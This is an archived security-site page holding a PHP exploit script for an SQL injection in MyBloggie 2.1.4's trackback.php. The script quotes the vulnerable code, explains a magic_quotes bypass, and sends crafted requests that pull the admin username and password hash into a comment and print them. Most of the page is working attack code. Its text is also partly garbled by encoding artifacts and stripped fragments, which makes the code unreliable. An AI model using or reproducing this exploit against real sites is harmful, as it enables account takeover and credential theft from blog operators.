Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Blogs :: b06-4058.htm

MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure

MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure
MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure

#!/usr/bin/php -q -d short_open_tag=on=0D\n";=0D 
echo "site:\n\n";=0D 
works regardless of php.ini settings=0D
against MySQL >= 4.1 (allowing subs)=0D
if ($argc<3) {=0D
echo "Usage: php ".$argv[0]." host path OPTIONS\n";=0D
echo "host:      target server (ip/hostname)\n";=0D
echo "path:      path to MyBloggie\n";=0D
echo "Options:\n";=0D
echo "   -i           specify an existent post id (default: 1)\n";=0D
echo "   -T[prefix]   specify a table prefix different from default (mb_)\n";=0D
echo "   -p[port]:    specify a port other than 80\n";=0D
echo "   -P[ip:port]: specify a proxy\n";=0D
echo "   -d:          disclose table prefix (reccomended)\n";=0D
echo "Example:\r\n";=0D
echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n";=0D
echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n";=0D
/* software site: 
  vulnerable code in trackback.php:=0D
if(!empty($_REQUEST['title'])) {=0D
else { $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : No title

"); }=0D =0D if(!empty($_REQUEST['url'])) {=0D $url=urldecode($_REQUEST['url']);=0D =0D if (validate_url($url)==false) { $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : URL not valid

"); }=0D }=0D else { $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : No URL

"); }=0D =0D if(!empty($_REQUEST['excerpt']))=0D {=0D $excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));=0D } else {=0D $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : No Excerpt

");=0D }=0D =0D // The blog name=0D if(!empty($_REQUEST['blog_name']))=0D {=0D $blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));=0D } else=0D {=0D $blog_name="No Blog Name";=0D }=0D =0D $timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ),=0D gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ),=0D gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));=0D =0D $sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,=0D poster = '$blog_name', home='$url', comment_type='trackback'";=0D =0D $result = $db->sql_query($sql) or die("Cannot query the database.
" . mysql_error());=0D ...=0D =0D you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument=0D with MySQL >= 4.1 that allows SELECT subqueries for INSERT...=0D =0D so you can insert admin username & password hash inside comments and you will see them at screen=0D also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc=0D with '%2527' sequence for the single quote char=0D adn you can disclose table prefix going to:=0D =0D =0D you will have an error that disloses a query fragment=0D =0D -=0D =0D ex., injecting code in 'title' argument, query becomes:=0D =0D INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' ,=0D poster = 'whatever', home='', comment_type='trackback'=0D */=0D =0D error_reporting(0);=0D ini_set("max_execution_time",0);=0D ini_set("default_socket_timeout",5);=0D =0D function quick_dump($string)=0D {=0D $result='';$exa='';$cont=0;=0D for ($i=0; $i<=strlen($string)-1; $i++)=0D {=0D if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))=0D {$result.=" .";}=0D else=0D {$result.=" ".$string[$i];}=0D if (strlen(dechex(ord($string[$i])))==2)=0D {$exa.=" ".dechex(ord($string[$i]));}=0D else=0D {$exa.=" 0".dechex(ord($string[$i]));}=0D $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}=0D }=0D return $exa."\r\n".$result;=0D }=0D $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';=0D function sendpacketii($packet)=0D {=0D global $proxy, $host, $port, $html, $proxy_regex;=0D if ($proxy=='') {=0D $ock=fsockopen(gethostbyname($host),$port);=0D if (!$ock) {=0D echo 'No response from '.$host.':'.$port; die;=0D }=0D }=0D else {=0D $c = preg_match($proxy_regex,$proxy);=0D if (!$c) {=0D echo 'Not a valid proxy...';die;=0D }=0D $parts=explode(':',$proxy);=0D echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";=0D $ock=fsockopen($parts[0],$parts[1]);=0D if (!$ock) {=0D echo 'No response from proxy...';die;=0D }=0D }=0D fputs($ock,$packet);=0D if ($proxy=='') {=0D $html='';=0D while (!feof($ock)) {=0D $html.=fgets($ock);=0D }=0D }=0D else {=0D $html='';=0D while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {=0D $html.=fread($ock,1);=0D }=0D }=0D fclose($ock);=0D #debug=0D #echo "\r\n".$html;=0D }=0D =0D function is_hash($hash)=0D {=0D if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}=0D else {return false;}=0D }=0D =0D $host=$argv[1];=0D $path=$argv[2];=0D $port=80;=0D $prefix="mb_";=0D $post_id="1";//admin=0D $proxy="";=0D $dt=0;=0D =0D for ($i=3; $i<$argc; $i++){=0D $temp=$argv[$i][0].$argv[$i][1];=0D if ($temp=="-p")=0D {=0D $port=str_replace("-p","",$argv[$i]);=0D }=0D if ($temp=="-P")=0D {=0D $proxy=str_replace("-P","",$argv[$i]);=0D }=0D if ($temp=="-T")=0D {=0D $prefix=str_replace("-T","",$argv[$i]);=0D }=0D if ($temp=="-i")=0D {=0D $post_id=(int) str_replace("-i","",$argv[$i]);=0D echo "post id -> ".$post_id."\n";=0D }=0D if ($temp=="-d")=0D {=0D $dt=1;=0D }=0D }=0D if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}=0D if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}=0D =0D if ($dt)=0D {=0D $packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";=0D $packet.="Host: ".$host."\r\n";=0D $packet.="Connection: Close\r\n\r\n";=0D sendpacketii($packet);=0D if (strstr($html,"You have an error in your SQL syntax"))=0D {=0D $temp=explode("UNIXTIME(",$html);=0D $temp2=explode("posts.timest",$temp[1]);=0D $prefix=$temp2[0];=0D echo "table prefix -> ".$prefix."\n";=0D }=0D }=0D =0D $sql="%2527,comments=(SELECT CONCAT(%2527%2527)FROM ".$prefix."user)/*";=0D //some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '%2527)FROM ".$prefix."user)/*";=0D $data="title=hi".$sql;=0D $data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";=0D $data.="&excerpt=whatever";=0D $data.="&blog_name=whatever";=0D $packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";=0D $packet.="Content-Type: application/x-www-form-urlencoded\r\n";=0D $packet.="Content-Length: ".strlen($data)."\r\n";=0D $packet.="Host: ".$host."\r\n";=0D $packet.="Connection: Close\r\n\r\n";=0D $packet.=$data;=0D sendpacketii($packet);=0D sleep(1);=0D =0D $packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";=0D $packet.="Host: ".$host."\r\n";=0D $packet.="Connection: Close\r\n\r\n";=0D sendpacketii($packet);=0D //echo $html;=0D $temp=explode('"message">",$temp[$i]);=0D if (is_hash($temp2[0]))=0D {=0D $hash=$temp2[0];=0D $temp2=explode("-->",$temp[$i+1]);=0D $admin=$temp2[0];=0D echo "----------------------------------------------------------------\n";=0D echo "admin -> ".$admin."\n";=0D echo "password (md5) -> ".$hash."\n";=0D echo "----------------------------------------------------------------\n";=0D die();=0D }=0D }=0D //if you are here...=0D echo "exploit failed...";=0D ?>=0D =0D original url:

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH